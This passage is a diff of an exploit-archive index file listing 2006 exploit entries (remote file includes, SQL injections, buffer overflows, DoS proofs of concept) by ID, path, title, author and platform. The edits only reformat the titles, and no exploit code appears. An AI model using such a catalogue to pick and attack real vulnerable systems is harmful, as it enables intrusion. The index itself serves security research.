2209,platforms/php/webapps/2209.txt,"Joomla Artlinks Component <= 1.0b4 - Remote Include",2006-08-18,camino,php,webapps,0 2210,platforms/windows/dos/2210.c,"Microsoft Windows - PNG File IHDR Block Denial of Service Exploit PoC (2)",2006-08-18,vegas78,windows,dos,0 -2211,platforms/php/webapps/2211.txt,"PHlyMail Lite <= 3.4.4 (mod.listmail.php) Remote Include",2006-08-18,Kacper,php,webapps,0 -2212,platforms/php/webapps/2212.txt,"phpCodeGenie <= 3.0.2 (BEAUT_PATH) Remote File Include",2006-08-18,Kacper,php,webapps,0 +2211,platforms/php/webapps/2211.txt,"PHlyMail Lite <= 3.4.4 - (mod.listmail.php) Remote Include",2006-08-18,Kacper,php,webapps,0 +2212,platforms/php/webapps/2212.txt,"phpCodeGenie <= 3.0.2 - (BEAUT_PATH) Remote File Include",2006-08-18,Kacper,php,webapps,0 2213,platforms/php/webapps/2213.txt,"Mambo MamboWiki Component <= 0.9.6 - Remote Include",2006-08-18,camino,php,webapps,0 2214,platforms/php/webapps/2214.txt,"Joomla Link Directory Component <= 1.0.3 - Remote Include",2006-08-18,camino,php,webapps,0 2215,platforms/php/webapps/2215.txt,"Joomla Kochsuite Component <= 0.9.4 - Remote File Include",2006-08-18,camino,php,webapps,0 -2216,platforms/php/webapps/2216.txt,"Sonium Enterprise Adressbook <= 0.2 (folder) Include",2006-08-18,"Philipp Niedziela",php,webapps,0 +2216,platforms/php/webapps/2216.txt,"Sonium Enterprise Adressbook <= 0.2 - (folder) Include",2006-08-18,"Philipp Niedziela",php,webapps,0 2217,platforms/php/webapps/2217.txt,"Mambo cropimage Component <= 1.0 - Remote File Include",2006-08-19,"Mehmet Ince",php,webapps,0 2218,platforms/php/webapps/2218.txt,"interact <= 2.2 - (CONFIG[BASE_PATH]) Remote File Include",2006-08-19,Kacper,php,webapps,0 2219,platforms/php/webapps/2219.php,"Joomla <= 1.0.10 - (poll component) Arbitrary Add Votes Exploit",2006-08-19,trueend5,php,webapps,0 -2220,platforms/php/webapps/2220.txt,"Tutti Nova <= 1.6 (TNLIB_DIR) Remote File Include",2006-08-19,SHiKaA,php,webapps,0 -2221,platforms/php/webapps/2221.txt,"Fantastic News <= 2.1.3 (script_path) Remote File Include",2006-08-19,SHiKaA,php,webapps,0 +2220,platforms/php/webapps/2220.txt,"Tutti Nova <= 1.6 - (TNLIB_DIR) Remote File Include",2006-08-19,SHiKaA,php,webapps,0 +2221,platforms/php/webapps/2221.txt,"Fantastic News <= 2.1.3 - (script_path) Remote File Include",2006-08-19,SHiKaA,php,webapps,0 2222,platforms/php/webapps/2222.txt,"Mambo com_lurm_constructor Component <= 0.6b Include",2006-08-19,mdx,php,webapps,0 2223,platforms/windows/remote/2223.c,"Microsoft Windows - CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139 2224,platforms/php/webapps/2224.txt,"ZZ:FlashChat <= 3.1 - (adminlog) Remote File Incude",2006-08-19,SHiKaA,php,webapps,0 2225,platforms/php/webapps/2225.txt,"mambo com_babackup Component <= 1.1 File Include",2006-08-19,mdx,php,webapps,0 2226,platforms/php/webapps/2226.txt,"NES Game and NES System <= c108122 File Include Vulnerabilities",2006-08-20,Kacper,php,webapps,0 -2227,platforms/php/webapps/2227.txt,"SportsPHool <= 1.0 (mainnav) Remote File Include",2006-08-20,Kacper,php,webapps,0 -2228,platforms/asp/webapps/2228.txt,"SimpleBlog <= 2.0 (comments.asp) Remote SQL Injection",2006-08-20,"Chironex Fleckeri",asp,webapps,0 +2227,platforms/php/webapps/2227.txt,"SportsPHool <= 1.0 - (mainnav) Remote File Include",2006-08-20,Kacper,php,webapps,0 +2228,platforms/asp/webapps/2228.txt,"SimpleBlog <= 2.0 - (comments.asp) Remote SQL Injection",2006-08-20,"Chironex Fleckeri",asp,webapps,0 2229,platforms/php/webapps/2229.txt,"Shadows Rising RPG <= 0.0.5b Remote File Include Vulnerabilities",2006-08-20,Kacper,php,webapps,0 -2230,platforms/asp/webapps/2230.txt,"LBlog <= 1.05 (comments.asp) Remote SQL Injection",2006-08-20,"Chironex Fleckeri",asp,webapps,0 -2231,platforms/php/webapps/2231.php,"Simple Machines Forum <= 1.1 rc2 (lngfile) Remote Exploit (windows)",2006-08-20,rgod,php,webapps,0 -2232,platforms/php/webapps/2232.pl,"SimpleBlog <= 2.0 (comments.asp) Remote SQL Injection Exploit",2006-08-20,ASIANEAGLE,php,webapps,0 -2233,platforms/windows/remote/2233.c,"WFTPD 3.23 (SIZE) Remote Buffer Overflow Exploit",2006-08-21,h07,windows,remote,21 +2230,platforms/asp/webapps/2230.txt,"LBlog <= 1.05 - (comments.asp) Remote SQL Injection",2006-08-20,"Chironex Fleckeri",asp,webapps,0 +2231,platforms/php/webapps/2231.php,"Simple Machines Forum <= 1.1 rc2 - (lngfile) Remote Exploit (windows)",2006-08-20,rgod,php,webapps,0 +2232,platforms/php/webapps/2232.pl,"SimpleBlog <= 2.0 - (comments.asp) Remote SQL Injection Exploit",2006-08-20,ASIANEAGLE,php,webapps,0 +2233,platforms/windows/remote/2233.c,"WFTPD 3.23 - (SIZE) Remote Buffer Overflow Exploit",2006-08-21,h07,windows,remote,21 2234,platforms/windows/remote/2234.py,"Easy File Sharing FTP Server 2.0 - (PASS) Remote Exploit (PoC)",2006-08-21,h07,windows,remote,21 -2235,platforms/php/webapps/2235.txt,"PHProjekt <= 6.1 (path_pre) Multiple Remote File Include Vulnerabilities",2006-08-21,"the master",php,webapps,0 +2235,platforms/php/webapps/2235.txt,"PHProjekt <= 6.1 - (path_pre) Multiple Remote File Include Vulnerabilities",2006-08-21,"the master",php,webapps,0 2236,platforms/php/webapps/2236.txt,"PHlyMail Lite <= 3.4.4 - (folderprops.php) Remote Include (2)",2006-08-21,Kw3[R]Ln,php,webapps,0 2237,platforms/multiple/dos/2237.sh,"Apache < 1.3.37 / 2.0.59 / 2.2.3 - (mod_rewrite) Remote Overflow PoC",2006-08-21,"Jacobo Avariento",multiple,dos,0 2238,platforms/windows/dos/2238.html,"Microsoft Internet Explorer Multiple COM Object Color Property DoS",2006-08-21,nop,windows,dos,0 -2239,platforms/php/webapps/2239.txt,"Empire CMS <= 3.7 (checklevel.php) Remote File Include",2006-08-22,"Bob Linuson",php,webapps,0 -2240,platforms/php/webapps/2240.txt,"HPE <= 1.0 (HPEinc) Remote File Include Vulnerabilities (updated)",2006-08-22,"the master",php,webapps,0 +2239,platforms/php/webapps/2239.txt,"Empire CMS <= 3.7 - (checklevel.php) Remote File Include",2006-08-22,"Bob Linuson",php,webapps,0 +2240,platforms/php/webapps/2240.txt,"HPE <= 1.0 - (HPEinc) Remote File Include Vulnerabilities (updated)",2006-08-22,"the master",php,webapps,0 2241,platforms/solaris/local/2241.c,"Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0 -2242,platforms/solaris/local/2242.sh,"Solaris 8 / 9 (/usr/ucb/ps) Local Information Leak Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0 +2242,platforms/solaris/local/2242.sh,"Solaris 8 / 9 - (/usr/ucb/ps) Local Information Leak Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0 2243,platforms/php/webapps/2243.php,"Simple Machines Forum <= 1.1 rc2 Lock Topics Remote Exploit",2006-08-22,rgod,php,webapps,0 -2244,platforms/multiple/dos/2244.pl,"Mozilla Firefox <= 1.5.0.6 (FTP Request) Remote Denial of Service Exploit",2006-08-22,"Tomas Kempinsky",multiple,dos,0 +2244,platforms/multiple/dos/2244.pl,"Mozilla Firefox <= 1.5.0.6 - (FTP Request) Remote Denial of Service Exploit",2006-08-22,"Tomas Kempinsky",multiple,dos,0 2245,platforms/windows/dos/2245.pl,"MDaemon POP3 Server < 9.06 - (USER) Remote Buffer Overflow PoC",2006-08-22,"Leon Juranic",windows,dos,0 2246,platforms/hardware/dos/2246.cpp,"2Wire Modems/Routers CRLF - Denial of Service Exploit",2006-08-22,preth00nker,hardware,dos,0 -2247,platforms/php/webapps/2247.php,"MercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit",2006-08-23,rgod,php,webapps,0 +2247,platforms/php/webapps/2247.php,"MercuryBoard <= 1.1.4 - (User-Agent) Remote SQL Injection Exploit",2006-08-23,rgod,php,webapps,0 2248,platforms/php/webapps/2248.pl,"phpBB All Topics Mod <= 1.5.0 - (start) Remote SQL Injection Exploit",2006-08-23,SpiderZ,php,webapps,0 -2249,platforms/php/webapps/2249.txt,"pSlash 0.7 (lvc_include_dir) Remote File Include",2006-08-23,"Mehmet Ince",php,webapps,0 -2250,platforms/php/webapps/2250.pl,"Integramod Portal <= 2.x (functions_portal.php) Remote Include Exploit",2006-08-23,nukedx,php,webapps,0 -2251,platforms/php/webapps/2251.pl,"VistaBB <= 2.x (functions_mod_user.php) Remote Include Exploit",2006-08-23,nukedx,php,webapps,0 +2249,platforms/php/webapps/2249.txt,"pSlash 0.7 - (lvc_include_dir) Remote File Include",2006-08-23,"Mehmet Ince",php,webapps,0 +2250,platforms/php/webapps/2250.pl,"Integramod Portal <= 2.x - (functions_portal.php) Remote Include Exploit",2006-08-23,nukedx,php,webapps,0 +2251,platforms/php/webapps/2251.pl,"VistaBB <= 2.x - (functions_mod_user.php) Remote Include Exploit",2006-08-23,nukedx,php,webapps,0 2252,platforms/php/webapps/2252.pl,"Wikepage Opus 10 <= 2006.2a (lng) - Remote Command Execution Exploit",2006-08-24,Hessam-x,php,webapps,0 2253,platforms/php/webapps/2253.php,"Phaos <= 0.9.2 basename() Remote Command Execution Exploit",2006-08-24,Kacper,php,webapps,0 -2254,platforms/php/webapps/2254.txt,"phpCOIN 1.2.3 (session_set.php) Remote Include",2006-08-24,Timq,php,webapps,0 +2254,platforms/php/webapps/2254.txt,"phpCOIN 1.2.3 - (session_set.php) Remote Include",2006-08-24,Timq,php,webapps,0 2255,platforms/php/webapps/2255.txt,"eFiction < 2.0.7 - Remote Admin Authentication Bypass",2006-08-25,Vipsta,php,webapps,0 -2256,platforms/php/webapps/2256.txt,"Integramod Portal <= 2.0 rc2 (phpbb_root_path) Remote File Include",2006-08-25,MATASANOS,php,webapps,0 -2257,platforms/php/webapps/2257.txt,"CliServ Web Community <= 0.65 (cl_headers) Include",2006-08-25,Kacper,php,webapps,0 +2256,platforms/php/webapps/2256.txt,"Integramod Portal <= 2.0 rc2 - (phpbb_root_path) Remote File Include",2006-08-25,MATASANOS,php,webapps,0 +2257,platforms/php/webapps/2257.txt,"CliServ Web Community <= 0.65 - (cl_headers) Include",2006-08-25,Kacper,php,webapps,0 2258,platforms/windows/remote/2258.py,"MDaemon POP3 Server < 9.06 - (USER) Remote Heap Overflow Exploit",2006-08-26,muts,windows,remote,110 -2259,platforms/php/webapps/2259.txt,"proManager <= 0.73 (note.php) Remote SQL Injection",2006-08-26,Kacper,php,webapps,0 -2260,platforms/php/webapps/2260.pl,"AlberT-EasySite <= 1.0a5 (PSA_PATH) Remote File Include Exploit",2006-08-27,Kacper,php,webapps,0 +2259,platforms/php/webapps/2259.txt,"proManager <= 0.73 - (note.php) Remote SQL Injection",2006-08-26,Kacper,php,webapps,0 +2260,platforms/php/webapps/2260.pl,"AlberT-EasySite <= 1.0a5 - (PSA_PATH) Remote File Include Exploit",2006-08-27,Kacper,php,webapps,0 2261,platforms/php/webapps/2261.php,"iziContents <= RC6 - GLOBALS[] Remote Code Execution Exploit",2006-08-27,Kacper,php,webapps,0 -2262,platforms/php/webapps/2262.php,"CMS Frogss <= 0.4 (podpis) Remote SQL Injection Exploit",2006-08-27,Kacper,php,webapps,0 +2262,platforms/php/webapps/2262.php,"CMS Frogss <= 0.4 - (podpis) Remote SQL Injection Exploit",2006-08-27,Kacper,php,webapps,0 2263,platforms/php/webapps/2263.txt,"Ay System CMS <= 2.6 - (main.php) Remote File Include",2006-08-27,SHiKaA,php,webapps,0 -2264,platforms/windows/local/2264.htm,"VMware 5.5.1 (ActiveX) Local Buffer Overflow Exploit",2006-08-27,c0ntex,windows,local,0 +2264,platforms/windows/local/2264.htm,"VMware 5.5.1 - (ActiveX) Local Buffer Overflow Exploit",2006-08-27,c0ntex,windows,local,0 2265,platforms/windows/remote/2265.c,"Microsoft Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040) (2)",2006-08-28,ub3rst4r,windows,remote,445 2266,platforms/cgi/webapps/2266.txt,"Cybozu Products (id) Arbitrary File Retrieval",2006-08-28,"Tan Chew Keong",cgi,webapps,0 2267,platforms/cgi/webapps/2267.txt,"Cybuzu Garoon 2.1.0 - Multiple Remote SQL Injection Vulnerabilities",2006-08-28,"Tan Chew Keong",cgi,webapps,0 @@ -1969,299 +1969,299 @@ id,file,description,date,author,platform,type,port 2272,platforms/php/webapps/2272.txt,"MiniBill <= 1.22b - config[plugin_dir] Remote File Inclusion Vulnerabilities",2006-08-29,"the master",php,webapps,0 2273,platforms/php/webapps/2273.txt,"ExBB Italiano <= 0.2 - exbb[home_path] Remote File Include",2006-08-29,SHiKaA,php,webapps,0 2274,platforms/linux/remote/2274.c,"Streamripper <= 1.61.25 HTTP Header Parsing Buffer Overflow Exploit",2006-08-29,Expanders,linux,remote,0 -2275,platforms/php/webapps/2275.txt,"phpECard <= 2.1.4 (functions.php) Remote File Include",2006-08-29,LeAk,php,webapps,0 -2276,platforms/windows/remote/2276.pm,"IBM eGatherer <= 3.20.0284.0 (ActiveX) Remote Code Execution Exploit",2006-08-29,"Francisco Amato",windows,remote,0 +2275,platforms/php/webapps/2275.txt,"phpECard <= 2.1.4 - (functions.php) Remote File Include",2006-08-29,LeAk,php,webapps,0 +2276,platforms/windows/remote/2276.pm,"IBM eGatherer <= 3.20.0284.0 - (ActiveX) Remote Code Execution Exploit",2006-08-29,"Francisco Amato",windows,remote,0 2277,platforms/windows/remote/2277.c,"Streamripper <= 1.61.25 - HTTP Header Parsing Buffer Overflow Exploit (2)",2006-08-29,psylocn,windows,remote,0 2278,platforms/windows/local/2278.cpp,"ZipCentral 4.01 - ZIP File Handling Local Buffer Overflow Exploit",2006-08-30,bratax,windows,local,0 -2279,platforms/php/webapps/2279.txt,"phpAtm <= 1.21 (include_location) Remote File Include Vulnerabilities",2006-08-30,KinSize,php,webapps,0 +2279,platforms/php/webapps/2279.txt,"phpAtm <= 1.21 - (include_location) Remote File Include Vulnerabilities",2006-08-30,KinSize,php,webapps,0 2280,platforms/php/webapps/2280.pl,"Lanifex DMO <= 2.3b (_incMgr) Remote File Include Exploit",2006-08-30,Kacper,php,webapps,0 -2281,platforms/php/webapps/2281.pl,"Pheap CMS <= 1.1 (lpref) Remote File Include Exploit",2006-08-31,Kacper,php,webapps,0 +2281,platforms/php/webapps/2281.pl,"Pheap CMS <= 1.1 - (lpref) Remote File Include Exploit",2006-08-31,Kacper,php,webapps,0 2282,platforms/php/webapps/2282.txt,"YACS CMS <= 6.6.1 - context[path_to_root] Remote File Include",2006-08-31,MATASANOS,php,webapps,0 -2283,platforms/windows/remote/2283.c,"TIBCO Rendezvous <= 7.4.11 (add router) Remote BoF Exploit",2006-09-01,"Andres Tarasco",windows,remote,0 +2283,platforms/windows/remote/2283.c,"TIBCO Rendezvous <= 7.4.11 - (add router) Remote BoF Exploit",2006-09-01,"Andres Tarasco",windows,remote,0 2284,platforms/windows/local/2284.c,"TIBCO Rendezvous <= 7.4.11 Password Extractor Local Exploit",2006-09-01,"Andres Tarasco",windows,local,0 2285,platforms/php/webapps/2285.txt,"MyBace Light (login_check.php) Remote File",2006-09-01,"Philipp Niedziela",php,webapps,0 2286,platforms/windows/local/2286.cpp,"PowerZip <= 7.06.3895 Long Filename Handling Buffer Overflow Exploit",2006-09-01,bratax,windows,local,0 2287,platforms/asp/webapps/2287.txt,"icblogger 2.0 - (YID) Remote SQL Injection",2006-09-01,"Chironex Fleckeri",asp,webapps,0 2288,platforms/php/webapps/2288.php,"TikiWiki <= 1.9 Sirius (jhot.php) Remote Command Execution Exploit",2006-09-02,rgod,php,webapps,0 2289,platforms/php/webapps/2289.pl,"Annuaire 1Two 2.2 - Remote SQL Injection Exploit",2006-09-02,DarkFig,php,webapps,0 -2290,platforms/php/webapps/2290.txt,"Dyncms <= Release 6 (x_admindir) Remote File Include",2006-09-02,SHiKaA,php,webapps,0 -2291,platforms/php/webapps/2291.php,"PmWiki <= 2.1.19 (Zend_Hash_Del_Key_Or_Index) Remote Exploit",2006-09-03,rgod,php,webapps,0 -2292,platforms/php/webapps/2292.txt,"yappa-ng <= 2.3.1 (admin_modules) Remote File Include",2006-09-03,SHiKaA,php,webapps,0 -2293,platforms/php/webapps/2293.txt,"FlashChat <= 4.5.7 (aedating4CMS.php) Remote File Include",2006-09-04,NeXtMaN,php,webapps,0 -2294,platforms/asp/webapps/2294.txt,"Muratsoft Haber Portal 3.6 (tr) Remote SQL Injection",2006-09-03,ASIANEAGLE,asp,webapps,0 -2295,platforms/php/webapps/2295.txt,"In-link <= 2.3.4 (ADODB_DIR) Remote File Include Vulnerabilities",2006-09-04,"Saudi Hackrz",php,webapps,0 -2296,platforms/asp/webapps/2296.txt,"SimpleBlog <= 2.3 (id) Remote SQL Injection",2006-09-04,Vipsta/MurderSkillz,asp,webapps,0 +2290,platforms/php/webapps/2290.txt,"Dyncms <= Release 6 - (x_admindir) Remote File Include",2006-09-02,SHiKaA,php,webapps,0 +2291,platforms/php/webapps/2291.php,"PmWiki <= 2.1.19 - (Zend_Hash_Del_Key_Or_Index) Remote Exploit",2006-09-03,rgod,php,webapps,0 +2292,platforms/php/webapps/2292.txt,"yappa-ng <= 2.3.1 - (admin_modules) Remote File Include",2006-09-03,SHiKaA,php,webapps,0 +2293,platforms/php/webapps/2293.txt,"FlashChat <= 4.5.7 - (aedating4CMS.php) Remote File Include",2006-09-04,NeXtMaN,php,webapps,0 +2294,platforms/asp/webapps/2294.txt,"Muratsoft Haber Portal 3.6 - (tr) Remote SQL Injection",2006-09-03,ASIANEAGLE,asp,webapps,0 +2295,platforms/php/webapps/2295.txt,"In-link <= 2.3.4 - (ADODB_DIR) Remote File Include Vulnerabilities",2006-09-04,"Saudi Hackrz",php,webapps,0 +2296,platforms/asp/webapps/2296.txt,"SimpleBlog <= 2.3 - (id) Remote SQL Injection",2006-09-04,Vipsta/MurderSkillz,asp,webapps,0 2297,platforms/php/webapps/2297.pl,"Tr Forum 2.0 - SQL Injection / Bypass Security Restriction Exploit",2006-09-04,DarkFig,php,webapps,0 -2298,platforms/php/webapps/2298.php,"pHNews <= alpha 1 (templates_dir) Remote Code Execution Exploit",2006-09-04,Kacper,php,webapps,0 +2298,platforms/php/webapps/2298.php,"pHNews <= alpha 1 - (templates_dir) Remote Code Execution Exploit",2006-09-04,Kacper,php,webapps,0 2299,platforms/php/webapps/2299.php,"PHP Proxima <= 6 - completepack Remote Code Execution Exploit",2006-09-04,Kacper,php,webapps,0 -2300,platforms/php/webapps/2300.pl,"SoftBB 0.1 (cmd) Remote Command Execution Exploit",2006-09-04,DarkFig,php,webapps,0 +2300,platforms/php/webapps/2300.pl,"SoftBB 0.1 - (cmd) Remote Command Execution Exploit",2006-09-04,DarkFig,php,webapps,0 2301,platforms/php/webapps/2301.txt,"MySpeach <= 3.0.2 - (my_ms[root]) Remote File Include",2006-09-05,SHiKaA,php,webapps,0 2302,platforms/windows/dos/2302.pl,"J. River Media Center 11.0.309 - Remote Denial of Service PoC",2006-09-05,n00b,windows,dos,0 -2303,platforms/multiple/dos/2303.html,"dsock <= 1.3 (buf) Remote Buffer Overflow PoC",2006-09-05,DaveK,multiple,dos,0 -2304,platforms/php/webapps/2304.txt,"GrapAgenda 0.1 (page) Remote File Include",2006-09-05,"Kurdish Security",php,webapps,0 -2305,platforms/php/webapps/2305.txt,"AnnonceV News Script <= 1.1 (page) Remote File Include",2006-09-05,"Kurdish Security",php,webapps,0 -2306,platforms/asp/webapps/2306.txt,"Zix Forum <= 1.12 (RepId) Remote SQL Injection",2006-09-05,"Chironex Fleckeri",asp,webapps,0 -2307,platforms/php/webapps/2307.txt,"ACGV News <= 0.9.1 (PathNews) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 -2308,platforms/php/webapps/2308.txt,"C-News <= 1.0.1 (path) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 -2309,platforms/php/webapps/2309.txt,"Sponge News <= 2.2 (sndir) Remote File Include",2006-09-05,SHiKaA,php,webapps,0 -2310,platforms/php/webapps/2310.php,"PhpCommander <= 3.0 (upload) Remote Code Execution Exploit",2006-09-05,Kacper,php,webapps,0 +2303,platforms/multiple/dos/2303.html,"dsock <= 1.3 - (buf) Remote Buffer Overflow PoC",2006-09-05,DaveK,multiple,dos,0 +2304,platforms/php/webapps/2304.txt,"GrapAgenda 0.1 - (page) Remote File Include",2006-09-05,"Kurdish Security",php,webapps,0 +2305,platforms/php/webapps/2305.txt,"AnnonceV News Script <= 1.1 - (page) Remote File Include",2006-09-05,"Kurdish Security",php,webapps,0 +2306,platforms/asp/webapps/2306.txt,"Zix Forum <= 1.12 - (RepId) Remote SQL Injection",2006-09-05,"Chironex Fleckeri",asp,webapps,0 +2307,platforms/php/webapps/2307.txt,"ACGV News <= 0.9.1 - (PathNews) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 +2308,platforms/php/webapps/2308.txt,"C-News <= 1.0.1 - (path) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 +2309,platforms/php/webapps/2309.txt,"Sponge News <= 2.2 - (sndir) Remote File Include",2006-09-05,SHiKaA,php,webapps,0 +2310,platforms/php/webapps/2310.php,"PhpCommander <= 3.0 - (upload) Remote Code Execution Exploit",2006-09-05,Kacper,php,webapps,0 2311,platforms/php/webapps/2311.txt,"phpBB Shadow Premod <= 2.7.1 - Remote File Include",2006-09-06,Kw3[R]Ln,php,webapps,0 -2312,platforms/php/webapps/2312.txt,"BinGo News <= 3.01 (bnrep) Remote File Include",2006-09-06,SHiKaA,php,webapps,0 -2313,platforms/php/webapps/2313.txt,"phpFullAnnu <= 5.1 (repmod) Remote File Include",2006-09-06,SHiKaA,php,webapps,0 -2314,platforms/php/webapps/2314.txt,"Beautifier 0.1 (Core.php) Remote File Include",2006-09-06,"the master",php,webapps,0 -2315,platforms/php/webapps/2315.txt,"Akarru <= 0.4.3.34 (bm_content) Remote File Include",2006-09-06,ddoshomo,php,webapps,0 +2312,platforms/php/webapps/2312.txt,"BinGo News <= 3.01 - (bnrep) Remote File Include",2006-09-06,SHiKaA,php,webapps,0 +2313,platforms/php/webapps/2313.txt,"phpFullAnnu <= 5.1 - (repmod) Remote File Include",2006-09-06,SHiKaA,php,webapps,0 +2314,platforms/php/webapps/2314.txt,"Beautifier 0.1 - (Core.php) Remote File Include",2006-09-06,"the master",php,webapps,0 +2315,platforms/php/webapps/2315.txt,"Akarru <= 0.4.3.34 - (bm_content) Remote File Include",2006-09-06,ddoshomo,php,webapps,0 2316,platforms/php/webapps/2316.txt,"PayProCart <= 1146078425 - Multiple Remote File Include Vulnerabilities",2006-09-07,momo26,php,webapps,0 -2317,platforms/php/webapps/2317.txt,"SL_Site <= 1.0 (spaw_root) Remote File Include",2006-09-07,Kw3[R]Ln,php,webapps,0 +2317,platforms/php/webapps/2317.txt,"SL_Site <= 1.0 - (spaw_root) Remote File Include",2006-09-07,Kw3[R]Ln,php,webapps,0 2318,platforms/php/webapps/2318.txt,"Web Server Creator 0.1 - (l) Remote Include",2006-09-07,"Mehmet Ince",php,webapps,0 -2319,platforms/php/webapps/2319.txt,"Fire Soft Board <= RC 3 (racine) Remote File Include",2006-09-07,ddoshomo,php,webapps,0 -2320,platforms/windows/remote/2320.txt,"IBM Director < 5.10 (Redirect.bat) Directory Transversal",2006-09-07,"Daniel Clemens",windows,remote,411 +2319,platforms/php/webapps/2319.txt,"Fire Soft Board <= RC 3 - (racine) Remote File Include",2006-09-07,ddoshomo,php,webapps,0 +2320,platforms/windows/remote/2320.txt,"IBM Director < 5.10 - (Redirect.bat) Directory Transversal",2006-09-07,"Daniel Clemens",windows,remote,411 2321,platforms/php/webapps/2321.php,"DokuWiki <= 2006-03-09b (dwpage.php) Remote Code Execution Exploit",2006-09-07,rgod,php,webapps,0 2322,platforms/php/webapps/2322.php,"DokuWiki <= 2006-03-09b (dwpage.php) System Disclosure Exploit",2006-09-07,rgod,php,webapps,0 -2323,platforms/php/webapps/2323.txt,"PhpNews 1.0 (Include) Remote File Include Vulnerabilities",2006-09-07,"the master",php,webapps,0 -2324,platforms/php/webapps/2324.txt,"ACGV News 0.9.1 (PathNews) Remote File Include",2006-09-07,ddoshomo,php,webapps,0 +2323,platforms/php/webapps/2323.txt,"PhpNews 1.0 - (Include) Remote File Include Vulnerabilities",2006-09-07,"the master",php,webapps,0 +2324,platforms/php/webapps/2324.txt,"ACGV News 0.9.1 - (PathNews) Remote File Include",2006-09-07,ddoshomo,php,webapps,0 2325,platforms/php/webapps/2325.txt,"News Evolution 3.0.3 - _NE[AbsPath] Remote File Include Vulnerabilities",2006-09-07,ddoshomo,php,webapps,0 2326,platforms/php/webapps/2326.txt,"WM-News <= 0.5 - Multiple Remote File Include Vulnerabilities",2006-09-07,ddoshomo,php,webapps,0 -2327,platforms/php/webapps/2327.txt,"PhotoKorn Gallery <= 1.52 (dir_path) Remote File Include Vulnerabilities",2006-09-07,"Saudi Hackrz",php,webapps,0 +2327,platforms/php/webapps/2327.txt,"PhotoKorn Gallery <= 1.52 - (dir_path) Remote File Include Vulnerabilities",2006-09-07,"Saudi Hackrz",php,webapps,0 2328,platforms/windows/remote/2328.php,"RaidenHTTPD 1.1.49 - (SoftParserFileXml) Remote Code Execution Exploit",2006-09-08,rgod,windows,remote,80 -2329,platforms/php/webapps/2329.txt,"Somery <= 0.4.6 (skin_dir) Remote File Include",2006-09-08,basher13,php,webapps,0 +2329,platforms/php/webapps/2329.txt,"Somery <= 0.4.6 - (skin_dir) Remote File Include",2006-09-08,basher13,php,webapps,0 2330,platforms/solaris/local/2330.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow Exploit (solaris/sparc) (1)",2006-09-08,"RISE Security",solaris,local,0 2331,platforms/solaris/local/2331.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow Exploit (solaris/x86)",2006-09-08,"RISE Security",solaris,local,0 2332,platforms/sco/local/2332.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow Exploit (sco/x86)",2006-09-08,"RISE Security",sco,local,0 -2333,platforms/php/webapps/2333.php,"CCleague Pro <= 1.0.1RC1 (Cookie) Remote Code Execution Exploit",2006-09-08,Kacper,php,webapps,0 +2333,platforms/php/webapps/2333.php,"CCleague Pro <= 1.0.1RC1 - (Cookie) Remote Code Execution Exploit",2006-09-08,Kacper,php,webapps,0 2334,platforms/windows/dos/2334.py,"Multithreaded TFTP <= 1.1 - (Long Get Request) Denial of Service Exploit",2006-09-08,n00b,windows,dos,0 -2335,platforms/php/webapps/2335.txt,"MyABraCaDaWeb <= 1.0.3 (base) Remote File Include Vulnerabilities",2006-09-08,ddoshomo,php,webapps,0 -2336,platforms/php/webapps/2336.pl,"Socketwiz Bookmarks <= 2.0 (root_dir) Remote File Include Exploit",2006-09-09,Kacper,php,webapps,0 -2337,platforms/php/webapps/2337.txt,"Vivvo Article Manager <= 3.2 (id) Remote SQL Injection",2006-09-09,MercilessTurk,php,webapps,0 -2338,platforms/linux/local/2338.c,"openmovieeditor <= 0.0.20060901 (name) Local Buffer Overflow Exploit",2006-09-09,Qnix,linux,local,0 +2335,platforms/php/webapps/2335.txt,"MyABraCaDaWeb <= 1.0.3 - (base) Remote File Include Vulnerabilities",2006-09-08,ddoshomo,php,webapps,0 +2336,platforms/php/webapps/2336.pl,"Socketwiz Bookmarks <= 2.0 - (root_dir) Remote File Include Exploit",2006-09-09,Kacper,php,webapps,0 +2337,platforms/php/webapps/2337.txt,"Vivvo Article Manager <= 3.2 - (id) Remote SQL Injection",2006-09-09,MercilessTurk,php,webapps,0 +2338,platforms/linux/local/2338.c,"openmovieeditor <= 0.0.20060901 - (name) Local Buffer Overflow Exploit",2006-09-09,Qnix,linux,local,0 2339,platforms/php/webapps/2339.txt,"Vivvo Article Manager <= 3.2 - (classified_path) File Include",2006-09-09,MercilessTurk,php,webapps,0 -2340,platforms/php/webapps/2340.txt,"PUMA <= 1.0 RC 2 (config.php) Remote File Include",2006-09-10,"Philipp Niedziela",php,webapps,0 +2340,platforms/php/webapps/2340.txt,"PUMA <= 1.0 RC 2 - (config.php) Remote File Include",2006-09-10,"Philipp Niedziela",php,webapps,0 2341,platforms/php/webapps/2341.txt,"Open Bulletin Board <= 1.0.8 - (root_path) File Include",2006-09-10,Eddy_BAck0o,php,webapps,0 -2342,platforms/php/webapps/2342.txt,"mcGalleryPRO <= 2006 (path_to_folder) Remote Include",2006-09-10,Solpot,php,webapps,0 +2342,platforms/php/webapps/2342.txt,"mcGalleryPRO <= 2006 - (path_to_folder) Remote Include",2006-09-10,Solpot,php,webapps,0 2343,platforms/php/webapps/2343.txt,"MiniPort@l <= 0.1.5 beta (skiny) Remote File Include",2006-09-11,Kacper,php,webapps,0 2344,platforms/php/webapps/2344.txt,"OPENi-CMS <= 1.0.1beta (config) Remote File Include",2006-09-11,basher13,php,webapps,0 -2345,platforms/windows/remote/2345.pl,"Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit (2)",2006-09-11,"Jacopo Cervini",windows,remote,143 +2345,platforms/windows/remote/2345.pl,"Mercur Mailserver 5.0 SP3 - (IMAP) Remote Buffer Overflow Exploit (2)",2006-09-11,"Jacopo Cervini",windows,remote,143 2346,platforms/php/webapps/2346.txt,"WTools 